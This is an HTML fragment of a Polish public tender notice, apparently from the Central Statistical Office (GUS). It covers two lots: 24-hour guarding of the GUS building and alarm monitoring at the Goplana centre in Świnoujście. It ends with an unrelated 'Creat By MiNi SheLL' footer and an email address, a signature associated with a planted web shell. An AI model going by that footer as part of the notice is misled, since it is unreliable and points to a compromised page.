<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach świadczenia przedmiotowej usługi, wykonawca zobowiązany będzie do: 1) skierowania do ochrony obiektu pracowników ochrony posiadających: a) szef zmiany ochrony - uprawnienia kwalifikowanego pracownika ochrony fizycznej posiadającego poświadczenie bezpieczeństwa dopuszczające do informacji niejawnych o klauzuli co najmniej poufne;  b)	pozostali pracownicy - upoważnienie do dostępu do informacji niejawnych o klauzuli zastrzeżone; c) wszyscy pracownicy - aktualne zaświadczenia o odbytym szkoleniu w zakresie ochrony informacji niejawnych; 2) zainstalowania na kosz własny urządzeń rejestrujących obchody pracowników ochrony; 3) całodobowej ochrony zewnętrznej i wewnętrznej obiektu mającej na celu zabezpieczenie mienia Zamawiającego oraz mienia powierzonego Zamawiającemu przed kradzieżą, włamaniem i dewastacją; 4) zapewnienia całodobowego stanu gotowości grupy interwencyjnej do podjęcia czynnych działań w przypadkach napaści lub włamania, w czasie zadeklarowanym przez wykonawcę w ofercie przetargowej; 5) dozorowania bramek kontroli dostępu oraz antynapadowych i antywłamaniowych urządzeń monitorujących, za pomocą urządzeń zainstalowanych w pomieszczeniu pełnienia służby ochrony; 6) kontrolowania osób wchodzących i wychodzących z budynku GUS; 7) wydawania i przyjmowanie kluczy do pomieszczeń; 8) informowania pracowników Zamawiającego o zgłaszających się do nich interesantach, prowadzenia ewidencji gości oraz wydawania zastępczych identyfikatorów (kart magnetycznych); 9) obsługiwania wind dla osób niepełnosprawnych przy bramkach kontroli dostępu w wejściu głównym;
10) dozorowania pomieszczeń kas GUS, Centrum Informatyki Statystycznej i Zakładu Wydawnictw Statystycznych; 11)	obsługi systemu telewizji przemysłowej; 12)	dozorowania i obsługiwania systemu alarmowo-pożarowego, a w szczególności pomieszczeń drukarni, składnicy druków, Centralnej Biblioteki Statystycznej (CBS), czytelni CBS, archiwów, pomieszczeń Centralnego Informatorium Statystycznego, serwerowni, garaży; 13)	wezwania, w sytuacji zagrożenia, odpowiednich służb - policji, straży pożarnej, pogotowia ratunkowego i wodociągowego, służb Stołecznego Przedsiębiorstwa Energetyki Cieplnej lub innych; 14) obsługiwania głównych wyłączników prądu, centralnego ogrzewania i wody - w sytuacjach awaryjnych wymagających interwencji; 15) dozorowania pomieszczeń, w których wykonywane były prace spawalnicze zarejestrowane w książce prac spawalniczych lub inne prace z otwartym ogniem po opuszczeniu tych pomieszczeń przez osoby wykonujące te prace; 16) opracowania i przedłożenia do zatwierdzenia przez Zamawiającego Instrukcji Ochrony GUS zawierającej: a) zadania pracowników wyznaczonych do ochrony obiektu GUS; b) zasady postępowania pracowników ochrony w przypadku wystąpienia zagrożeń oraz awarii technicznych; c) szczegółowe zakresy obowiązków pracowników ochrony na poszczególnych posterunkach; d) określenie sposobu postępowania pracowników ochrony w przypadku zagrożeń przeciwko zdrowiu i mieniu; e) określenie sposobu postępowania pracowników ochrony w przypadku naruszeniu przepisów o ochronie informacji niejawnych; 17)	zatrudnienia do realizacji usługi ochrony, w ramach realizacji klauzuli społecznej, zgodnie z art. 29 ust. 4 ustawy, co najmniej 1 osoby bezrobotnej przez cały okres realizacji zamówienia w pełnym wymiarze czasu pracy, tj.: okres nie krótszy niż do dnia 30 listopada 2016 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Czas dojazdu grupy interwencyjnej - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi ochrony w zakresie monitorowania systemu alarmowego zainstalowanego w ośrodku Goplana z siedzibą w Świnoujściu przy ul. Żeromskiego 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach świadczenia przedmiotowej usługi, wykonawca zobowiązany będzie do: 1) zainstalowania na koszt własny w ośrodku Goplana lokalnego systemu alarmowego; 2)utrzymania w pełnej sprawności lokalnego systemu alarmowego poprzez dokonywanie czynności konserwacyjnych i napraw bieżących; 3) całodobowego monitorowania lokalnego systemu alarmowego polegającego na przyjmowaniu informacji o zdarzeniach i stanie chronionego obiektu; 4) przekazywania informacji o zdarzeniach osobom upoważnionym przez Zamawiającego; 5) wezwania, w sytuacji zagrożenia, odpowiednich służb - policji, straży pożarnej, pogotowia ratunkowego i wodociągowego, służb Przedsiębiorstwa Energetyki Cieplnej lub innych; 6) podjęcia niezbędnych działań zmierzających do: a) zminimalizowania skutków włamania lub napadu; b) ujęcia w obiekcie lub jego pobliżu osób, które dopuściły się zamachu na chronione dobro; c) ochrony obiektu w przypadku naruszenia jego zabezpieczenia (wybicie szyby, wyłamanie drzwi itp.) do czasu przybycia przedstawiciela Zamawiającego; d) zabezpieczenia dowodów świadczących o popełnieniu przestępstwa, prowadzącego do powstania szkody w majątku Zamawiającego; 7) zapewnienia całodobowego stanu gotowości grupy interwencyjnej do podjęcia czynnych działań w przypadkach napaści lub włamania; 8) zatrudnienia do realizacji usługi ochrony, zgodnie z art. 29 ust. 4 ustawy, co najmniej 1 osoby na umowę o pracę w pełnym wymiarze czasu pracy, przez cały okres realizacji zamówienia, tj.: na okres nie krótszy niż do dnia 30 listopada 2016 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Czas dojazdu grupy interwencyjnej - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com